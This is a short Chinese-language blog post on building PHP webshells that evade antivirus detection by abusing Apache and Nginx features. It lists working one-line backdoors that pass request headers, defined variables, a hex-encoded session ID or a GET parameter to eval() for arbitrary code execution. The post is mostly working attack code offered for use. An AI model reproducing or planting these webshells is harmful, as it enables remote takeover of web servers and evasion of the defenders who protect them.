PHP利用Apache、Nginx的特性实现免杀Webshell
- 发表于
- webshell
| 环境 | 函数 | 用法 |
|---|---|---|
| nginx |
get_defined_vars()
| 返回由所有已定义变量所组成的数组 |
| apache |
getallheaders()
| 获取全部 HTTP 请求头信息 |
apache环境
| 1 2 3 | <?php eval(next(getallheaders())); ?> |
apache和nginx环境通用
| 1 2 3 | <?php eval(implode(reset(get_defined_vars()))); ?> |
另外一种通过执行伪造的sessionid值,进行任意代码执行。
| 1 2 3 | <?php eval(hex2bin(session_id(session_start()))); ?> |
给webshell加密码
| 1 | <?php eval(get_defined_vars()['_GET']['cmd']);?> |
原文连接:PHP利用Apache、Nginx的特性实现免杀Webshell 所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。 
